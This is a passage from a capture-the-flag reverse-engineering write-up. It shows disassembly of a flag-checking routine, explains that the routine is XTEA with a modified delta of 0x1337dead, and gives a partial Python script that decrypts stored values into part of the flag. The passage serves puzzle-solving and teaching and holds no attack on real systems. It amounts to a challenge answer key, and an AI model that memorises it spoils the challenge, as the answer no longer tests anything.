  5a:   c7 <span class="hljs-number">45</span> e4 a7 <span class="hljs-number">38</span> b2 <span class="hljs-number">70</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x1c</span>],<span class="hljs-number">0x70b238a7</span>
  <span class="hljs-number">61</span>:   c7 <span class="hljs-number">45</span> e8 f1 3c b5 <span class="hljs-number">72</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x18</span>],<span class="hljs-number">0x72b53cf1</span>
  <span class="hljs-number">68</span>:   c7 <span class="hljs-number">45</span> ec <span class="hljs-number">09</span> <span class="hljs-number">02</span> 7c d4    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x14</span>],<span class="hljs-number">0xd47c0209</span>
  6f:   c7 <span class="hljs-number">45</span> ac <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x54</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">76</span>:   e9 <span class="hljs-number">13</span> <span class="hljs-number">01</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>          <span class="hljs-keyword">jmp</span>    <span class="hljs-number">0x18e</span>
  7b:   8b <span class="hljs-number">45</span> ac                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x54</span>]
  7e:   <span class="hljs-number">48</span> <span class="hljs-number">63</span> d0                <span class="hljs-keyword">movsxd</span> <span class="hljs-built_in">rdx</span>,<span class="hljs-built_in">eax</span>
  <span class="hljs-number">81</span>:   <span class="hljs-number">48</span> 8b <span class="hljs-number">45</span> <span class="hljs-number">98</span>             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x68</span>]
  <span class="hljs-number">85</span>:   <span class="hljs-number">48</span> <span class="hljs-number">01</span> d0                <span class="hljs-keyword">add</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">rdx</span>
  <span class="hljs-number">88</span>:   0f b6 <span class="hljs-number">00</span>                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>]
  8b:   0f be c0                <span class="hljs-keyword">movsx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">al</span>
  8e:   <span class="hljs-number">25</span> ff <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>          <span class="hljs-keyword">and</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0xff</span>
  <span class="hljs-number">93</span>:   <span class="hljs-number">89</span> <span class="hljs-number">45</span> a4                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x5c</span>],<span class="hljs-built_in">eax</span>
  <span class="hljs-number">96</span>:   8b <span class="hljs-number">45</span> ac                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x54</span>]
  <span class="hljs-number">99</span>:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
  9b:   <span class="hljs-number">48</span> <span class="hljs-number">8d</span> <span class="hljs-number">50</span> <span class="hljs-number">04</span>             <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">rdx</span>,[<span class="hljs-built_in">rax</span>+<span class="hljs-number">0x4</span>]
  9f:   <span class="hljs-number">48</span> 8b <span class="hljs-number">45</span> <span class="hljs-number">98</span>             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x68</span>]
<span class="hljs-symbol">  a3:</span>   <span class="hljs-number">48</span> <span class="hljs-number">01</span> d0                <span class="hljs-keyword">add</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">rdx</span>
<span class="hljs-symbol">  a6:</span>   0f b6 <span class="hljs-number">00</span>                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>]
<span class="hljs-symbol">  a9:</span>   0f be c0                <span class="hljs-keyword">movsx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">al</span>
<span class="hljs-symbol">  ac:</span>   <span class="hljs-number">25</span> ff <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>          <span class="hljs-keyword">and</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0xff</span>
<span class="hljs-symbol">  b1:</span>   <span class="hljs-number">89</span> <span class="hljs-number">45</span> a8                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x58</span>],<span class="hljs-built_in">eax</span>
<span class="hljs-symbol">  b4:</span>   c7 <span class="hljs-number">45</span> b4 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x4c</span>],<span class="hljs-number">0x0</span>
<span class="hljs-symbol">  bb:</span>   c7 <span class="hljs-number">45</span> bc ad de <span class="hljs-number">37</span> <span class="hljs-number">13</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x44</span>],<span class="hljs-number">0x1337dead</span>
<span class="hljs-symbol">  c2:</span>   c7 <span class="hljs-number">45</span> c0 <span class="hljs-number">43</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x40</span>],<span class="hljs-number">0x43</span>
<span class="hljs-symbol">  c9:</span>   c7 <span class="hljs-number">45</span> c4 <span class="hljs-number">30</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x3c</span>],<span class="hljs-number">0x30</span>
<span class="hljs-symbol">  d0:</span>   c7 <span class="hljs-number">45</span> c8 <span class="hljs-number">52</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x38</span>],<span class="hljs-number">0x52</span>
<span class="hljs-symbol">  d7:</span>   c7 <span class="hljs-number">45</span> cc <span class="hljs-number">33</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x34</span>],<span class="hljs-number">0x33</span>
<span class="hljs-symbol">  de:</span>   c7 <span class="hljs-number">45</span> b8 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>],<span class="hljs-number">0x0</span>
<span class="hljs-symbol">  e5:</span>   c7 <span class="hljs-number">45</span> b8 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>],<span class="hljs-number">0x0</span>
<span class="hljs-symbol">  ec:</span>   eb <span class="hljs-number">65</span>                   <span class="hljs-keyword">jmp</span>    <span class="hljs-number">0x153</span>
<span class="hljs-symbol">  ee:</span>   8b <span class="hljs-number">45</span> a8                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x58</span>]
<span class="hljs-symbol">  f1:</span>   c1 e0 <span class="hljs-number">04</span>                <span class="hljs-keyword">shl</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x4</span>
<span class="hljs-symbol">  f4:</span>   <span class="hljs-number">89</span> c2                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">eax</span>
<span class="hljs-symbol">  f6:</span>   8b <span class="hljs-number">45</span> a8                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x58</span>]
<span class="hljs-symbol">  f9:</span>   c1 e8 <span class="hljs-number">05</span>                <span class="hljs-keyword">shr</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x5</span>
<span class="hljs-symbol">  fc:</span>   <span class="hljs-number">31</span> c2                   <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">eax</span>
<span class="hljs-symbol">  fe:</span>   8b <span class="hljs-number">45</span> a8                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x58</span>]
 <span class="hljs-number">101</span>:   <span class="hljs-number">8d</span> 0c <span class="hljs-number">02</span>                <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">ecx</span>,[<span class="hljs-built_in">rdx</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>]
 <span class="hljs-number">104</span>:   8b <span class="hljs-number">45</span> b4                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x4c</span>]
 <span class="hljs-number">107</span>:   <span class="hljs-number">83</span> e0 <span class="hljs-number">03</span>                <span class="hljs-keyword">and</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x3</span>
 10a:   <span class="hljs-number">89</span> c0                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">eax</span>
 10c:   8b <span class="hljs-number">54</span> <span class="hljs-number">85</span> c0             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x40</span>]
 <span class="hljs-number">110</span>:   8b <span class="hljs-number">45</span> b4                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x4c</span>]
 <span class="hljs-number">113</span>:   <span class="hljs-number">01</span> d0                   <span class="hljs-keyword">add</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">edx</span>
 <span class="hljs-number">115</span>:   <span class="hljs-number">31</span> c8                   <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">ecx</span>
 <span class="hljs-number">117</span>:   <span class="hljs-number">01</span> <span class="hljs-number">45</span> a4                <span class="hljs-keyword">add</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x5c</span>],<span class="hljs-built_in">eax</span>
 11a:   8b <span class="hljs-number">45</span> bc                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x44</span>]
 <span class="hljs-number">11d</span>:   <span class="hljs-number">01</span> <span class="hljs-number">45</span> b4                <span class="hljs-keyword">add</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x4c</span>],<span class="hljs-built_in">eax</span>
 <span class="hljs-number">120</span>:   8b <span class="hljs-number">45</span> a4                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x5c</span>]
 <span class="hljs-number">123</span>:   c1 e0 <span class="hljs-number">04</span>                <span class="hljs-keyword">shl</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x4</span>
 <span class="hljs-number">126</span>:   <span class="hljs-number">89</span> c2                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">eax</span>
 <span class="hljs-number">128</span>:   8b <span class="hljs-number">45</span> a4                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x5c</span>]
 12b:   c1 e8 <span class="hljs-number">05</span>                <span class="hljs-keyword">shr</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x5</span>
 12e:   <span class="hljs-number">31</span> c2                   <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">eax</span>
 <span class="hljs-number">130</span>:   8b <span class="hljs-number">45</span> a4                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x5c</span>]
 <span class="hljs-number">133</span>:   <span class="hljs-number">8d</span> 0c <span class="hljs-number">02</span>                <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">ecx</span>,[<span class="hljs-built_in">rdx</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>]
 <span class="hljs-number">136</span>:   8b <span class="hljs-number">45</span> b4                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x4c</span>]
 <span class="hljs-number">139</span>:   c1 e8 <span class="hljs-number">0b</span>                <span class="hljs-keyword">shr</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0xb</span>
 13c:   <span class="hljs-number">83</span> e0 <span class="hljs-number">03</span>                <span class="hljs-keyword">and</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x3</span>
 13f:   <span class="hljs-number">89</span> c0                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">eax</span>
 <span class="hljs-number">141</span>:   8b <span class="hljs-number">54</span> <span class="hljs-number">85</span> c0             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x40</span>]
 <span class="hljs-number">145</span>:   8b <span class="hljs-number">45</span> b4                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x4c</span>]
 <span class="hljs-number">148</span>:   <span class="hljs-number">01</span> d0                   <span class="hljs-keyword">add</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">edx</span>
 14a:   <span class="hljs-number">31</span> c8                   <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">ecx</span>
 14c:   <span class="hljs-number">01</span> <span class="hljs-number">45</span> a8                <span class="hljs-keyword">add</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x58</span>],<span class="hljs-built_in">eax</span>
 14f:   <span class="hljs-number">83</span> <span class="hljs-number">45</span> b8 <span class="hljs-number">01</span>             <span class="hljs-keyword">add</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>],<span class="hljs-number">0x1</span>
 <span class="hljs-number">153</span>:   <span class="hljs-number">83</span> <span class="hljs-number">7d</span> b8 1f             <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>],<span class="hljs-number">0x1f</span>
 <span class="hljs-number">157</span>:   7e <span class="hljs-number">95</span>                   <span class="hljs-keyword">jle</span>    <span class="hljs-number">0xee</span>
 <span class="hljs-number">159</span>:   8b <span class="hljs-number">45</span> ac                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x54</span>]
 15c:   <span class="hljs-number">01</span> c0                   <span class="hljs-keyword">add</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">eax</span>
 15e:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 <span class="hljs-number">160</span>:   8b <span class="hljs-number">44</span> <span class="hljs-number">85</span> d0             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x30</span>]
 <span class="hljs-number">164</span>:   <span class="hljs-number">39</span> <span class="hljs-number">45</span> a4                <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x5c</span>],<span class="hljs-built_in">eax</span>
 <span class="hljs-number">167</span>:   <span class="hljs-number">74</span> <span class="hljs-number">07</span>                   <span class="hljs-keyword">je</span>     <span class="hljs-number">0x170</span>
 <span class="hljs-number">169</span>:   c7 <span class="hljs-number">45</span> b0 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x50</span>],<span class="hljs-number">0x0</span>
 <span class="hljs-number">170</span>:   8b <span class="hljs-number">45</span> ac                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x54</span>]
 <span class="hljs-number">173</span>:   <span class="hljs-number">01</span> c0                   <span class="hljs-keyword">add</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">eax</span>
 <span class="hljs-number">175</span>:   <span class="hljs-number">83</span> c0 <span class="hljs-number">01</span>                <span class="hljs-keyword">add</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x1</span>
 <span class="hljs-number">178</span>:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 17a:   8b <span class="hljs-number">44</span> <span class="hljs-number">85</span> d0             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">4</span>-<span class="hljs-number">0x30</span>]
 17e:   <span class="hljs-number">39</span> <span class="hljs-number">45</span> a8                <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x58</span>],<span class="hljs-built_in">eax</span>
 <span class="hljs-number">181</span>:   <span class="hljs-number">74</span> <span class="hljs-number">07</span>                   <span class="hljs-keyword">je</span>     <span class="hljs-number">0x18a</span>
 <span class="hljs-number">183</span>:   c7 <span class="hljs-number">45</span> b0 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x50</span>],<span class="hljs-number">0x0</span>
 18a:   <span class="hljs-number">83</span> <span class="hljs-number">45</span> ac <span class="hljs-number">01</span>             <span class="hljs-keyword">add</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x54</span>],<span class="hljs-number">0x1</span>
 18e:   <span class="hljs-number">83</span> <span class="hljs-number">7d</span> ac <span class="hljs-number">03</span>             <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x54</span>],<span class="hljs-number">0x3</span>
 <span class="hljs-number">192</span>:   0f 8e e3 fe ff ff       <span class="hljs-keyword">jle</span>    <span class="hljs-number">0x7b</span>
 <span class="hljs-number">198</span>:   8b <span class="hljs-number">45</span> b0                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x50</span>]
 19b:   <span class="hljs-number">48</span> 8b <span class="hljs-number">75</span> f8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rsi</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x8</span>]
 19f:   <span class="hljs-number">64</span> <span class="hljs-number">48</span> <span class="hljs-number">33</span> <span class="hljs-number">34</span> <span class="hljs-number">25</span> <span class="hljs-number">28</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">rsi</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> <span class="hljs-built_in">fs</span>:<span class="hljs-number">0x28</span>
 1a6:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 1a8:   <span class="hljs-number">74</span> <span class="hljs-number">05</span>                   <span class="hljs-keyword">je</span>     <span class="hljs-number">0x1af</span>
 1aa:   e8 fd fa ff ff          <span class="hljs-keyword">call</span>   <span class="hljs-number">0xfffffffffffffcac</span>
 1af:   c9                      <span class="hljs-keyword">leave</span>  
 1b0:   c3                      <span class="hljs-keyword">ret</span>
</code></pre><p><code>shl    eax,0x4</code> and <code>shr    eax,0x5</code> indicate that check2 is XTEA encryption. However, the delta is <code>0x1337dead</code> instead of <code>0x9E3779B9</code>. It&#39;s a customized XTEA encryption.</p>
<p>I use the following script to get the second part of flag which is <code>_muCh_F0</code></p>
<pre class="hljs"><code>key=[<span class="hljs-number">0x43</span>,<span class="hljs-number">0x30</span>,<span class="hljs-number">0x52</span>,<span class="hljs-number">0x33</span>]



num_rounds=<span class="hljs-number">0x20</span>
<span class="hljs-built_in">v0</span>=<span class="hljs-number">95</span>
<span class="hljs-built_in">v1</span>=<span class="hljs-number">104</span>
delta=<span class="hljs-number">0x1337dead</span>
sum1=<span class="hljs-number">0</span><span class="hljs-comment">;</span>

for i in range(<span class="hljs-number">0x20</span>):
        <span class="hljs-built_in">v0</span> += (((<span class="hljs-built_in">v1</span> &lt;&lt; <span class="hljs-number">4</span>) ^ (<span class="hljs-built_in">v1</span> &gt;&gt; <span class="hljs-number">5</span>)) + <span class="hljs-built_in">v1</span>) ^ (sum1 + key[sum1 &amp; <span class="hljs-number">3</span>])<span class="hljs-comment">;</span>
        <span class="hljs-built_in">v0</span> %= <span class="hljs-number">0x100000000</span>
        sum1 += delta<span class="hljs-comment">;</span>
        sum1 %= <span class="hljs-number">0x100000000</span>
        <span class="hljs-built_in">v1</span> += (((<span class="hljs-built_in">v0</span> &lt;&lt; <span class="hljs-number">4</span>) ^ (<span class="hljs-built_in">v0</span> &gt;&gt; <span class="hljs-number">5</span>)) + <span class="hljs-built_in">v0</span>) ^ (sum1 + key[(sum1&gt;&gt;<span class="hljs-number">11</span>) &amp; <span class="hljs-number">3</span>])<span class="hljs-comment">;</span>
        <span class="hljs-built_in">v1</span> %= <span class="hljs-number">0x100000000</span>
print hex(<span class="hljs-built_in">v0</span>),hex(<span class="hljs-built_in">v1</span>)


flag1=<span class="hljs-string">""</span>
flag2=<span class="hljs-string">""</span>

v=[<span class="hljs-number">0x95cb8dbd</span>,<span class="hljs-number">0xf84cc79</span>]
num_rounds=<span class="hljs-number">0x20</span>
<span class="hljs-built_in">v0</span>=v[<span class="hljs-number">0</span>]
<span class="hljs-built_in">v1</span>=v[<span class="hljs-number">1</span>]
delta=<span class="hljs-number">0x1337dead</span>
sum1=delta*num_rounds<span class="hljs-comment">;</span>

for i in range(<span class="hljs-number">0x20</span>):
        <span class="hljs-built_in">v1</span> -= (((<span class="hljs-built_in">v0</span> &lt;&lt; <span class="hljs-number">4</span>) ^ (<span class="hljs-built_in">v0</span> &gt;&gt; <span class="hljs-number">5</span>)) + <span class="hljs-built_in">v0</span>) ^ (sum1 + key[(sum1&gt;&gt;<span class="hljs-number">11</span>) &amp; <span class="hljs-number">3</span>])<span class="hljs-comment">;</span>
        <span class="hljs-built_in">v1</span> %= <span class="hljs-number">0x100000000</span>
        sum1 -= delta<span class="hljs-comment">;</span>
        sum1 %= <span class="hljs-number">0x100000000</span>
        <span class="hljs-built_in">v0</span> -= (((<span class="hljs-built_in">v1</span> &lt;&lt; <span class="hljs-number">4</span>) ^ (<span class="hljs-built_in">v1</span> &gt;&gt; <span class="hljs-number">5</span>)) + <span class="hljs-built_in">v1</span>) ^ (sum1 + key[sum1 &amp; <span class="hljs-number">3</span>])<span class="hljs-comment">;</span>
        <span class="hljs-built_in">v0</span> %= <span class="hljs-number">0x100000000</span>
print chr(<span class="hljs-built_in">v0</span>),chr(<span class="hljs-built_in">v1</span>)
flag1+=chr(<span class="hljs-built_in">v0</span>)
flag2+=chr(<span class="hljs-built_in">v1</span>)

v=[<span class="hljs-number">0xb899a876</span>,<span class="hljs-number">0xa5dab55</span>]
num_rounds=<span class="hljs-number">0x20</span>
<span class="hljs-built_in">v0</span>=v[<span class="hljs-number">0</span>]
<span class="hljs-built_in">v1</span>=v[<span class="hljs-number">1</span>]
delta=<span class="hljs-number">0x1337dead</span>
sum1=delta*num_rounds<span class="hljs-comment">;</span>

for i in range(<span class="hljs-number">0x20</span>):
        <span class="hljs-built_in">v1</span> -= (((<span class="hljs-built_in">v0</span> &lt;&lt; <span class="hljs-number">4</span>) ^ (<span class="hljs-built_in">v0</span> &gt;&gt; <span class="hljs-number">5</span>)) + <span class="hljs-built_in">v0</span>) ^ (sum1 + key[(sum1&gt;&gt;<span class="hljs-number">11</span>) &amp; <span class="hljs-number">3</span>])<span class="hljs-comment">;</span>
        <span class="hljs-built_in">v1</span> %= <span class="hljs-number">0x100000000</span>
        sum1 -= delta<span class="hljs-comment">;</span>
        sum1 %= <span class="hljs-number">0x100000000</span>
        <span class="hljs-built_in">v0</span> -= (((<span class="hljs-built_in">v1</span> &lt;&lt; <span class="hljs-number">4</span>) ^ (<span class="hljs-built_in">v1</span> &gt;&gt; <span class="hljs-number">5</span>)) + <span class="hljs-built_in">v1</span>) ^ (sum1 + key[sum1 &amp; <span class="hljs-number">3</span>])<span class="hljs-comment">;</span>
        <span class="hljs-built_in">v0</span> %= <span class="hljs-number">0x100000000</span>
print chr(<span class="hljs-built_in">v0</span>),chr(<span class="hljs-built_in">v1</span>)
flag1+=chr(<span class="hljs-built_in">v0</span>)
flag2+=chr(<span class="hljs-built_in">v1</span>)
v=[<span class="hljs-number">0x9a8b3bba</span>,<span class="hljs-number">0x70b238a7</span>]
num_rounds=<span class="hljs-number">0x20</span>
